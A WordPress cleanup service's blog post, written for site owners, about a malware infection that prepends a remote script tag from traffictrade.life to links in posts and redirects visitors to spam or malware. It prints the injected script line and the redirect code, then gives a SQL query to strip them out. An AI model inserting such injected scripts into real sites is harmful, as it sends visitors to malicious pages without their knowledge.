Recently I’ve been contacted by several clients reporting malware on their WordPress sites which redirects pages and post to other websites like http://traffictrade.life. It is affecting pretty much all the posts and pages of the site.

They’re simply looking for “<a href” which is code they know will be present in virtually every post on a WordPress site, and they’re prepending a remote Javascript include to it. This Javascript immediately redirects users through several intermediate sites, finally arriving at pages containing spam or malware.

This malware injected your website with only one line code:

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

script.js content:
document.location.href = ‘https://redirect.trafficreceiver.club/landing/’;

thats thect location, then redirects to few more domains.

If you are know basic SQL Query, you can run this query to remove the malware:

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;

Double-check if you installed a cache plugin and make sure to clear the cache afterwards otherwise you’ll see no difference.

You may contact your hosting provider support to help you to remove this malware, but most hosting companies typically will not assist in the removal of this code since it is a 3rd part application (WordPress). They may offer you a premium site monitoring and malware removal service which is often expensive, unnecessary and in some instances unable to address this problem.

It is very important to get this quickly and completely removed as Google will remove any pages where the code is found from their search results.

Google has detected sneaky redirects on your site. This means that your site is using technology that detects user characteristics—such as region or device—to direct the user to an unexpected page. This causes unexpected search results for Google Search users and violates our Webmaster Guidelines. Therefore, Google has prevented the offending pages from showing in search results. If you remove the sneaky redirects, our system will automatically reflect these changes as we update our index.

If you don’t know programming and never know SQL Query, we can help you to remove the malware.
We are confident in our work. You only pay when the job is done. Once you are 100% satisfied, we will send a Paypal invoice. No upfront payment is needed. Please contact us for more information.

How long does it take?

Every website is different so the amount of time it will take will depend on how complex the infection is, but we can usually complete the cleaning process on the same day.

What info do you need?

We will need access to your website, so login details for WordPress admin are required, in some case we need to access to your cPanel or FTP.

Please contact us for more information.



Related Posts

Recommended File Permissions for WordPress

July 31, 2017

Security, Tutorial, WordPress

What permissions should I have for the following: Root folder storing all the WordPress content wp-admin wp-content wp-includes On computer filesystems, different files and directories have permissions that specify who and what can read, write, modify and access them. This is important because WordPress may need access to write to files in your wp-content directory to enable certain functions. […]

Read More

How to Prevent SQL injection in PHP 2017

July 31, 2017

PHP, Security, Tutorial

SQL injection happens when you interpolate some content into a SQL query string, and the result modifies the syntax of your query in ways you didn’t intend. It doesn’t have to be malicious, it can be an accident. But accidental SQL injection is more likely to result in an error than in a vulnerability. The […]

Read More